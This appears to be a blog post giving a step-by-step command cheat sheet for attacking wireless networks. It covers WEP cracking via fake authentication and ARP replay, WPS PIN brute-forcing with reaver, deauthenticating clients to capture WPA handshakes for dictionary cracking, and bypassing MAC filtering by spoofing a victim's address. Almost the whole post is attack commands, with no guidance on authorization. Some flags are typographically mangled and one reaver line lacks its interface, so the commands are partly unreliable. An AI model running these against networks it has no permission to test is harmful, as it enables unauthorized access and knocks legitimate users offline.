Wireless Penetration Testing

Open the Monitor Mode

root@mfk:~# ifconfig wlan0mon down

root@mfk:~# iwconfig wlan0mon mode monitor

root@mfk:~# ifconfig wlan0mon up

WEP Cracking

1. Fake Authentication Attack

root@mfk:~# airmon-ng start wlan0

root@mfk:~# airodump-ng –c <AP_channel> -b <BSSID> -w <filename> wlan0mon

My mac?

root@mfk:~# macchanger –show wlan0mon

root@mfk:~# aireplay-ng -1 0 -a <BSSID> -h <MyMac> -e <ESSID> wlan0mon

root@mfk:~# aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF  -b <BSSID> -h <MyMac> wlan0mon

root@mfk:~# aircrack-ng  -b <BSSID> <filename.pcap>

2. ARP Replay Attack

root@mfk:~# airmon-ng start wlan0

root@mfk:~# airodump-ng -c <AP_Channel> -b <BSSID> -w <filename> wlan0mon

My mac?

root@mfk:~# macchanger –show wlan0mon

root@mfk:~# aireplay-ng -3 -x 10 -n 10 –b <BSSID> -h <MyMac> wlan0mon

root@mfk:~# aircrack-ng -b <BSSID> <filename.pcap>

WPA/WPA2 Cracking

1. WPS Attack

root@mfk:~# airmon-ng start wlan0

root@mfk:~# apt-get install reaver

root@mfk:~# wash -i wlan0mon

root@mfk:~# reaver -i wlan0mon -b <BSSID> -vv -S

Or

root@mfk:~# reaver -i -c <channel> -b <BSSID> -p <pin> -vv -S

2. Dictionary Attack

root@mfk:~# airmon-ng start wlan0

root@mfk:~# airodump-ng -c <AP_Channel> -b <BSSID> -w <filename> wlan0mon

root@mfk:~# aireplay-ng -0 1 -a <BSSID> -c <victim_mac> wlan0mon

root@mfk:~# aircrack-ng -w <wordlist> -b <BSSID> <handshaked.pcap>

3. John The Ripper

root@mfk:~# airmon-ng start wlan0

root@mfk:~# airodump-ng -c <Channel> -b <BSSID> -w <FileName> wlan0mon

root@mfk:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon

root@mfk:~# cd /pentest/passwords/john

root@mfk:~# john –wordlist=<wordlist> –rules  –stdout|aircrack-ng -0 -e <ESSID> -w – <filename.pcap>

Mac Filtering Bypassing

root@mfk:~# airmon-ng start wlan0

root@mfk:~# airodump-ng –c <AP_Channel> -b <BSSID> -w <filename> wlan0mon

root@mfk:~# aireplay-ng -0 10 –a <BSSID> -c <victim_mac> wlan0mon

root@mfk:~# ifconfig wlan0mon down

root@mfk:~# macchanger –-mac <victim_mac> wlan0mon

root@mfk:~# ifconfig wlan0mon up

root@mfk:~# aireplay-ng -3 –b <BSSID> -h <fakedmac> wlan0mon

 

Advertisements

One thought on “Wireless Penetration Testing

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s